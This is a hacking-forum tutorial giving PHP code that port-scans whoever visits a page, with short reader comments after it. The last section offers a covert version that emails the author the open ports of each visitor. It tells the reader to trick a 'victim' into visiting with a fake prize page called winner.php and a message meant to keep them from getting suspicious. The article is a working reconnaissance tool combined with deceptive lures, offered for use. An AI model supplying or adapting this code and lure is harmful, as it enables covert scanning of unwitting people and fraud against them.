Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

PHP Port Scanner


PHP Port Scanner

By ghostghost | 4956 Reads |
0     0

All you have to do is do is connect to each port using the fsockopen() function. If you cannot connect its closed or protected, if you can its open!

For example can we connect to FTP on the users machine?

//Set the port number (FTP in this example) $port = '21';

//Gets users IP $ip = $_SERVER['REMOTE_ADDR'];

//Try connecting to port $fp = @fsockopen($ip, $port, &$errno, &$errstr, 1);

if (!$fp) { echo "Port $port is closed!"; } else { echo "Port $port is <b>open!</b>"; }

Now here is a way to scan multiple ports…

//Set all port numbers in an array $ports = array(21,23,25,79,80,110,135,137,138,139,143,443,445,1433,3306,3389);

//Gets users IP $ip = $_SERVER['REMOTE_ADDR'];

//Start loop for each port for ($i = 0; $i < sizeof($ports); $i++) {

//Get current port number from array $port = $ports[$i];

//Try connecting to port $fp = @fsockopen($ip, $port, &$errno, &$errstr, 1);

if (!$fp) { echo "Port $port is closed! <BR>"; } else { echo "Port $port is <b>open!</b> <BR>"; } }

But what happens if you dont want the user to know their ports are being scanned? You could set it up so that only open ports are reported to you…

//Set all port numbers in an array $ports = array(21,23,25,79,80,110,135,137,138,139,143,443,445,1433,3306,3389);

//Gets users IP $ip = $_SERVER['REMOTE_ADDR'];

//Start loop for each port for ($i = 0; $i < sizeof($ports); $i++) {

//Get current port number from array $port = $ports[$i];

//Try connecting to port $fp = @fsockopen($ip, $port, &$errno, &$errstr, 1);

//This time we are checking if we CAN connect (notice the missing ! next to $fp) if ($fp) {

//This will send you an email (change the address)

mail('me@hotmail.com', 'Open Port', 'User with IP '.$ip.' has port '.$port.' open!');

} }

To get the user to go to the script, you could save all the code in a file called 'winner.php' then tell the victim that they have won a prize and they are to visit that page. You could then add to the file to echo at the end "Congratulations on winning, we will contact you shortly" or something so that they dont get suspicious.

Good luck :-)

Comments
ghost's avatar
ghost 18 years ago

I made the file with everything u said and saved it .php but when i tried executing the code, it said they couldn't find a program suitable for the script. Do I need something in order to execute php code??

ghost's avatar
ghost 18 years ago

What do you mean " it said they couldn't find a program suitable for the script" ?? You just put it into a .php file, upload it to a server with PHP installed on it and go to it in your web browser!

ghost's avatar
ghost 18 years ago

I liked it ;)

ghost's avatar
ghost 18 years ago

It was a very good article. Haven't tried it though. :right: